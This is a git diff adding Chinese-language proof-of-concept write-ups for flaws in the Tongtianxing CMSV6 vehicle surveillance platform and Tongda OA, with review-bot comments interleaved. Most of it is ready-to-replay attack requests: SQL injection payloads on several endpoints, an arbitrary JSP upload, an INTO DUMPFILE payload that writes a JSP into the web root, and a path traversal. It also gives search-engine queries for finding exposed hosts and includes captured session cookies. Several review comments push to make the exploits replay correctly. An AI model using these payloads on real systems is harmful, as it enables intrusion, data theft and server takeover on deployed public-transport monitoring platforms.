@@ -0,0 +1,51 @@ +# 通天星CMSV6车载视频监控平台 getAlarmAppealByGuid存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/lnRXUcYiC0A3P_mY/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-410488.png) + +# 四、漏洞复现 +```rust +POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded + +guid=1') UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x4878597253544d464658514545495671627943586f73584f5056504164416342614549794a446b45,0x71717a7671),NULL-- - +``` + +![1717263406398-da903405-30a5-4b1d-9f7a-d357e304e250.png](./img/lnRXUcYiC0A3P_mY/1717263406398-da903405-30a5-4b1d-9f7a-d357e304e250-477232.png) + +```rust +qxxjqHxYrSTMFFXQEEIVqbyCXosXOPVPAdAcBaEIyJDkEqqzvq +``` + +```rust +POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded + +guid=1 +``` + +![1717263425891-e939657e-86f6-492b-baff-4047d8ab502a.png](./img/lnRXUcYiC0A3P_mY/1717263425891-e939657e-86f6-492b-baff-4047d8ab502a-078476.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file 
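Review bot: the string `qxxjqHxYrSTMFFXQEEIVqbyCXosXOPVPAdAcBaEIyJDkEqqzvq` is shown without saying what it is; it is the decoded `CONCAT(0x7178786a71,0x4878...,0x71717a7671)` from the UNION payload and should be labelled as the marker to look for in the response. The `guid=1') UNION ALL SELECT NULL,...,NULL-- -` payload also fixes the column count at three; state that, and add a `Content-Length` to the POST requests.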
diff --git a/通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md b/通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md new file mode 100644 index 0000000..ee5f825 --- /dev/null +++ b/通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md @@ -0,0 +1,49 @@ +# 通天星CMSV6车载视频监控平台 inspect_file存在任意文件上传漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 inspect_file存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/jUid1OxjXoRrC2t_/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-651656.png) + +# 四、漏洞复现 +```plain +POST /inspect_file/upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Length: 209 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Type: multipart/form-data; boundary=00content0boundary00 +Accept-Encoding: gzip, deflate + +--00content0boundary00 +Content-Disposition: form-data; name="uploadFile"; filename="1.jsp" +Content-Type: application/ocet-stream + +<% out.println("435352Els1K9wZvOlSsdsdmrg"); %> +--00content0boundary00-- +``` + +![1711442433836-11ccee10-a5e8-48da-bc64-14c0946ac2a4.png](./img/jUid1OxjXoRrC2t_/1711442433836-11ccee10-a5e8-48da-bc64-14c0946ac2a4-277023.png) + +上传文件位置 + +```plain +/upload/software/185859979470834_1.jsp +``` + +![1711442455597-99c0ecf1-513c-482a-87cf-dc08827ee05d.png](./img/jUid1OxjXoRrC2t_/1711442455597-99c0ecf1-513c-482a-87cf-dc08827ee05d-597295.png) + +[tongtianxing-inspectfile-upload.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362336502-b3be6c93-a873-4f21-ae01-ef858e24e559.yaml) + + + +> 更新: 2024-12-28 13:05:36 +> 原文: \ No newline at end of file 
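Review bot: the upload response is never described, yet the stored location `/upload/software/185859979470834_1.jsp` contains a server-generated numeric prefix; say whether `/inspect_file/upload` returns that filename in its response body, because otherwise the reader cannot locate the uploaded file. Also `Content-Type: application/ocet-stream` in the part header is misspelled (`octet-stream`); if the misspelling is deliberate say so, otherwise fix it and re-check that `Content-Length: 209` still matches the body.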
diff --git a/通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md new file mode 100644 index 0000000..e35f3a3 --- /dev/null +++ b/通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md @@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 kq_schedule存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/OJGsYbfBirSjQZ9t/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-467613.png) + +# 四、漏洞复现 +```rust +GET /kq_schedule/delete;downloadLogger.action?ids=1+AND+%28SELECT+9567+FROM+%28SELECT%28SLEEP%285%29%29%29zPmp%29 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717268117442-a6599a3f-e665-4ee0-9364-10de4fcc243d.png](./img/OJGsYbfBirSjQZ9t/1717268117442-a6599a3f-e665-4ee0-9364-10de4fcc243d-156222.png) + +```rust +GET /kq_schedule/delete;downloadLogger.action?ids=1 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717268130763-479651e7-aa3d-4114-afad-91b384dd1840.png](./img/OJGsYbfBirSjQZ9t/1717268130763-479651e7-aa3d-4114-afad-91b384dd1840-531987.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md new file mode 100644 index 0000000..02d3609 --- /dev/null 
+++ b/通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md @@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 line_manage存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/F4enrv2hHyz0sLln/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-130124.png) + +# 四、漏洞复现 +```rust +GET /line_manage/delete;downloadLogger.action?ids=1+AND+%28SELECT+4476+FROM+%28SELECT%28SLEEP%285%29%29%29ytWS%29 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717262506770-17a548a5-f207-4114-9195-5660ad1b8153.png](./img/F4enrv2hHyz0sLln/1717262506770-17a548a5-f207-4114-9195-5660ad1b8153-218646.png) + +```rust +GET /line_manage/delete;downloadLogger.action?ids=1 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717262527580-86540e20-0078-4842-abdf-59e984bacf4f.png](./img/F4enrv2hHyz0sLln/1717262527580-86540e20-0078-4842-abdf-59e984bacf4f-620776.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md new file mode 100644 index 0000000..72c7a89 --- /dev/null +++ b/通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md 
@@ -0,0 +1,49 @@ +# 通天星CMSV6车载视频监控平台 list存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台list存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/tmu3Xxcc1F3mcmjk/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-245533.png) + +# 四、漏洞复现 +```rust +POST /dynamic_monitoring_ledger/list;downloadLogger.action HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 5 + +statisticTime=1%27+AND+%28SELECT+8849+FROM+%28SELECT%28SLEEP%285%29%29%29uSno%29+AND+%27OOJG%27%3D%27OOJG&companyId=1 +``` + +![1717267151736-c56bcaa3-cb69-441e-8b04-e805212faca0.png](./img/tmu3Xxcc1F3mcmjk/1717267151736-c56bcaa3-cb69-441e-8b04-e805212faca0-757112.png) + +```rust +POST /dynamic_monitoring_ledger/list;downloadLogger.action HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 5 + +statisticTime=1&companyId=1 +``` + +![1717267165188-7b3988d6-74f8-4a05-be91-13a7164216c7.png](./img/tmu3Xxcc1F3mcmjk/1717267165188-7b3988d6-74f8-4a05-be91-13a7164216c7-396815.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md new file mode 100644 index 0000000..ad9c952 --- /dev/null 
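Review bot: as in the complex entry, `Content-Length: 5` is wrong for both bodies of the list entry (`statisticTime=1%27+AND+...&companyId=1` and `statisticTime=1&companyId=1`), so a verbatim replay truncates the body; fix it. Both `/dynamic_monitoring_ledger/list` and `/dynamic_monitoring_ledger/complex` inject through the same `statisticTime` parameter with the same payload; say whether they hit one underlying query so the reader knows whether to test both.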
+++ b/通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md @@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 list存在信息泄露漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台list存在信息泄露漏洞. + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/IV8qZP8iGWlBN37Q/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-245697.png) + +# 四、漏洞复现 +```plain +POST /xz_center/list HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=07B1AA29791CD9F46FCEFA01A13C216B +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 6 + +page=1 +``` + +![1703432021521-6d6a9adc-749b-4056-964d-5278a0aa0ce5.png](./img/IV8qZP8iGWlBN37Q/1703432021521-6d6a9adc-749b-4056-964d-5278a0aa0ce5-588079.png) + +nuclei脚本 + +[通天星-CMSV6-list-信息泄露.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362335694-f59d95ab-6b75-4975-a77a-c3ffb8b4a7b0.yaml) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md new file mode 100644 index 0000000..341bb5f --- /dev/null +++ b/通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md 
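Review bot: the title `list存在信息泄露漏洞` collides with the `list存在SQL注入漏洞` entry although the endpoint here is `/xz_center/list`, not `/dynamic_monitoring_ledger/list`; put the controller name in the title and filename. The entry also never says what the `page=1` response leaks; name the fields so the nuclei template's matcher can be reviewed against the text.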
@@ -0,0 +1,39 @@ +# 通天星CMSV6车载视频监控平台 merge存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台merge存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/Afrkn5c6A6CUIImS/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-135980.png) + +# 四、漏洞复现 +```plain +POST /point_manage/merge HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: + +id=1&name=9' UNION SELECT%0aNULL, 0x3c25206f75742e7072696e74282248656c6c6f20576f726c642122293b206e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b20253e,NULL,NULL,NULL,NULL,NULL,NULL +INTO dumpfile '../../tomcat/webapps/gpsweb/testqwe.jsp' FROM user_session a +WHERE '9 '='9 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_time=8 +``` + +![1719308744478-3dcb8622-37c6-4df6-b680-6efbdd362858.png](./img/Afrkn5c6A6CUIImS/1719308744478-3dcb8622-37c6-4df6-b680-6efbdd362858-321423.png) + +```plain +/testqwe.jsp +``` + +![1719308766874-83e8ee62-5756-4956-a24c-8785c401dcba.png](./img/Afrkn5c6A6CUIImS/1719308766874-83e8ee62-5756-4956-a24c-8785c401dcba-983012.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md new file mode 100644 index 0000000..73e73f1 --- /dev/null +++ b/通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md 
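Review bot: the merge entry is more than SQL injection: the payload writes a JSP via `INTO dumpfile '../../tomcat/webapps/gpsweb/testqwe.jsp'`, and the hex literal decodes to a JSP that prints `Hello World!` and then deletes itself, which is code-execution impact and should be stated in the summary. Document the preconditions that make `INTO DUMPFILE` work (MySQL `FILE` privilege on the application account, `secure_file_priv` not restricting the target path, the webroot writable by the database process, and the relative `../../tomcat/webapps/gpsweb` layout matching the install), and fill the empty `Content-Length:` header.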
@@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 muck_vehi_certificate存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/AThSrn99nkgiA3Y4/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-994540.png) + +# 四、漏洞复现 +```rust +GET /muck_vehi_certificate/delete;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717266956493-8a4748d9-9bb9-499e-a7da-7fb88f1bc75f.png](./img/AThSrn99nkgiA3Y4/1717266956493-8a4748d9-9bb9-499e-a7da-7fb88f1bc75f-451592.png) + +```rust +GET /muck_vehi_certificate/delete;downloadLogger.action?ids=1 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717266974188-6ec35cdb-4b33-457b-8191-8a4af2d9c1a4.png](./img/AThSrn99nkgiA3Y4/1717266974188-6ec35cdb-4b33-457b-8191-8a4af2d9c1a4-848409.png) + + + +> 更新: 2024-12-28 13:05:33 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md new file mode 100644 index 0000000..1721890 --- /dev/null +++ b/通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md 
@@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 run_stop/delete存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台run_stop/delete存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/GsVEgLsQEOTVpq0J/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-051769.png) + +# 四、漏洞复现 +```plain +GET /run_stop/delete.do;downloadLogger.action?ids=1+AND+%28SELECT+4195+FROM+%28SELECT%28SLEEP%283%29%29%29BDMG%29 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=6D759FDA5ECC223DF29DFE45859F13DC +Upgrade-Insecure-Requests: 1 +``` + +![1711706599578-2ac6a406-86bb-4b63-9b20-75c9f88b3331.png](./img/GsVEgLsQEOTVpq0J/1711706599578-2ac6a406-86bb-4b63-9b20-75c9f88b3331-964758.png) + +sqlmap + +```plain +/run_stop/delete.do;downloadLogger.action?ids=1 +``` + +![1711706619835-8f722db4-84ac-4323-93ff-d2c308201ca6.png](./img/GsVEgLsQEOTVpq0J/1711706619835-8f722db4-84ac-4323-93ff-d2c308201ca6-175576.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md new file mode 100644 index 0000000..88781ea --- /dev/null +++ b/通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md 
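Review bot: `Cookie: JSESSIONID=6D759FDA5ECC223DF29DFE45859F13DC` is a captured session identifier committed verbatim; replace it with a placeholder. The `sqlmap` heading is followed only by a bare path, with no command line and no note on what the screenshot shows, so it documents nothing a reader can check. `影响版本` lists only the product with no version range.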
@@ -0,0 +1,44 @@ +# 通天星CMSV6车载视频监控平台 task_record_detail/delete存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台task_record_detail/delete存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/lOUel4FBxVvzVwmN/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-677661.png) + +# 四、漏洞复现 +```java +GET /task_record_detail/delete;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+ HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40 +Connection: close +Content-Length: 0 +``` + +![1712850651277-f7c97be6-37ce-4294-a3de-578d5aa2ea1d.png](./img/lOUel4FBxVvzVwmN/1712850651277-f7c97be6-37ce-4294-a3de-578d5aa2ea1d-177606.png) + +sqlmap + +```java +/task_record_detail/delete;downloadLogger.action?ids=1) +``` + +![1712850782609-4e5c9d7e-83f7-424a-a2c9-6b4e13128715.png](./img/lOUel4FBxVvzVwmN/1712850782609-4e5c9d7e-83f7-424a-a2c9-6b4e13128715-805008.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file diff --git a/通达OA down.php接口存在未授权访问漏洞.md b/通达OA down.php接口存在未授权访问漏洞.md index 5bba152..557b3e1 100644 --- a/通达OA down.php接口存在未授权访问漏洞.md +++ b/通达OA down.php接口存在未授权访问漏洞.md 
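Review bot: the two fences are tagged ```java for a raw HTTP request and a URL path, which highlights them as Java; use ```plain like the other CMSV6 entries. The request carries `Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40`, a captured session value that should be a placeholder, and `Content-Length: 0` on a GET is proxy-capture noise. One sentence noting that this injection point closes a parenthesis (`ids=1)`, also reflected in the sqlmap path) would stop the file being mistaken for a copy of the `run_stop/delete.do` entry.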
@@ -17,3 +17,5 @@ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive ``` + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281008543.png) diff --git a/通达OA-down.php接口存在未授权访问漏洞.md b/通达OA-down.php接口存在未授权访问漏洞.md new file mode 100644 index 0000000..5bba152 --- /dev/null +++ b/通达OA-down.php接口存在未授权访问漏洞.md @@ -0,0 +1,19 @@ + +## 通达OA down.php接口存在未授权访问漏洞 + +## fofa +``` +app="TDXK-通达OA" +``` + +## poc + +``` +http://127.0.0.1/inc/package/down.php?id=../../../cache/org + +GET /inc/package/down.php?id=../../../cache/org HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +``` diff --git a/通达OA-get_datas.php前台sql注入.md b/通达OA-get_datas.php前台sql注入.md new file mode 100644 index 0000000..03c87d1 --- /dev/null +++ 